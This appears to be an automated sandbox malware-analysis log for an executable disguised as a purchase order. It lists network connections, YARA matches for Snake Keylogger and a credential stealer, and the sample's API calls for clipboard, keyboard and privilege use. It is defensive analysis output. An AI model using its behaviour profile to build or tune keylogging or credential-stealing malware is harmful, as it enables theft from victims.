                      Source: unknownNetwork traffic detected: HTTP traffic on port 61567 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61678
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61690 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61558
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61559
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61670
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61550
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61578 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61662 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61671
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61551
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61554
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61649 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61555
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61676
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61690
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61600 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61656 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61528 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61562 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61567
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61688
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61579 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61680
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61684 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61681
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61562
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61563
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61684
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61685
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61566
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61605 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61678 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61523 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61534 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61578
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61579
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61616 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61622 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61570
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61571
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61692
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61694
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61574
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61575
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61696
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61517 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61551 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61698
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49724 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61520 version: TLS 1.2
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0045A10F
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0047C81C

                      System Summary

                      barindex
                      Source: 5.2.name.exe.3f40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 5.2.name.exe.3f40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 2.2.name.exe.3740000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 5.2.name.exe.3f40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 2.2.name.exe.3740000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 2.2.name.exe.3740000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 2.2.name.exe.3740000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 2.2.name.exe.3740000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 2.2.name.exe.3740000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 5.2.name.exe.3f40000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 5.2.name.exe.3f40000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 5.2.name.exe.3f40000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000006.00000002.4535184676.0000000000363000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: name.exe PID: 4592, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: name.exe PID: 1292, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: RegSvcs.exe PID: 5688, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: initial sampleStatic PE information: Filename: New Order PO#86637.exe
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004333BE
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0042200C0_2_0042200C
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0041A2170_2_0041A217
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004122160_2_00412216
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0042435D0_2_0042435D
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004033C00_2_004033C0
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0044F4300_2_0044F430
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004125E80_2_004125E8
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0044663B0_2_0044663B
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004096A00_2_004096A0
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004138010_2_00413801
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0042096F0_2_0042096F
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004129D00_2_004129D0
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004119E30_2_004119E3
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0041C9AE0_2_0041C9AE
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0047EA6F0_2_0047EA6F
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0040FA100_2_0040FA10
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0044EB5F0_2_0044EB5F
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00423C810_2_00423C81
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00411E780_2_00411E78
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00442E0C0_2_00442E0C
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00420EC00_2_00420EC0
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0044CF170_2_0044CF17
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00444FD20_2_00444FD2
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0420C6980_2_0420C698
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_042186782_2_04218678
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0298D2783_2_0298D278
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029853623_2_02985362
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0298C1473_2_0298C147
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0298C7383_2_0298C738
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0298C4683_2_0298C468
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0298CA083_2_0298CA08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0298E9883_2_0298E988
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029869A03_2_029869A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0298CFA93_2_0298CFA9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02986FC83_2_02986FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0298CCD83_2_0298CCD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02989DE03_2_02989DE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_029829E03_2_029829E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0298E97A3_2_0298E97A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0298F9613_2_0298F961
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02983E093_2_02983E09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06541E803_2_06541E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_065417A03_2_065417A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06549C703_2_06549C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654FC683_2_0654FC68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_065495483_2_06549548
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06540B303_2_06540B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_065450283_2_06545028
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_065429683_2_06542968
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06541E703_2_06541E70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654DE003_2_0654DE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654E6B03_2_0654E6B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654E6AA3_2_0654E6AA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654EF513_2_0654EF51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654EF603_2_0654EF60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654178F3_2_0654178F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654CC8F3_2_0654CC8F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654CCA03_2_0654CCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654D5503_2_0654D550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654D5403_2_0654D540
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654DDF23_2_0654DDF2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654E2583_2_0654E258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654E24A3_2_0654E24A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654EAF83_2_0654EAF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654EB083_2_0654EB08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06540B203_2_06540B20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_065493283_2_06549328
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06549BFA3_2_06549BFA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06548B913_2_06548B91
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654F3B83_2_0654F3B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06548BA03_2_06548BA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654F3A83_2_0654F3A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_065400403_2_06540040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654F8103_2_0654F810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_065450183_2_06545018
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654F8023_2_0654F802
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654003F3_2_0654003F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654D0F83_2_0654D0F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654295A3_2_0654295A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654D9993_2_0654D999
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0654D9A83_2_0654D9A8
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0042200C5_2_0042200C
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0041A2175_2_0041A217
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_004122165_2_00412216
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0042435D5_2_0042435D
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_004033C05_2_004033C0
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0044F4305_2_0044F430
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_004125E85_2_004125E8
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0044663B5_2_0044663B
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_004096A05_2_004096A0
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_004138015_2_00413801
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0042096F5_2_0042096F
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_004129D05_2_004129D0
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_004119E35_2_004119E3
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0041C9AE5_2_0041C9AE
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0047EA6F5_2_0047EA6F
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0040FA105_2_0040FA10
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0044EB5F5_2_0044EB5F
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00423C815_2_00423C81
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00411E785_2_00411E78
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00442E0C5_2_00442E0C
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00420EC05_2_00420EC0
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0044CF175_2_0044CF17
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00444FD25_2_00444FD2
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_046486A05_2_046486A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0250D2786_2_0250D278
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_025053626_2_02505362
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0250A0886_2_0250A088
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0250C1466_2_0250C146
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0250C7386_2_0250C738
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0250C4686_2_0250C468
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0250CA086_2_0250CA08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0250E9886_2_0250E988
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_025069A06_2_025069A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02503E096_2_02503E09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02506FC86_2_02506FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0250CFAA6_2_0250CFAA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0250CCD86_2_0250CCD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02503AA16_2_02503AA1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0250F9746_2_0250F974
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0250E97A6_2_0250E97A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_025029EC6_2_025029EC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFFC686_2_04CFFC68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF9C706_2_04CF9C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF95486_2_04CF9548
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF1E806_2_04CF1E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF17A06_2_04CF17A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF50286_2_04CF5028
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF29686_2_04CF2968
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF0B306_2_04CF0B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFCCA06_2_04CFCCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF9C096_2_04CF9C09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFDDFF6_2_04CFDDFF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFD5506_2_04CFD550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFE6AF6_2_04CFE6AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFE6B06_2_04CFE6B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF1E706_2_04CF1E70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFDE006_2_04CFDE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF178F6_2_04CF178F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFEF606_2_04CFEF60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFD0F86_2_04CFD0F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF00406_2_04CF0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF00076_2_04CF0007
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CF501E6_2_04CF501E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFF8106_2_04CFF810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFD9A86_2_04CFD9A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_04CFD9A76_2_04CFD9A7
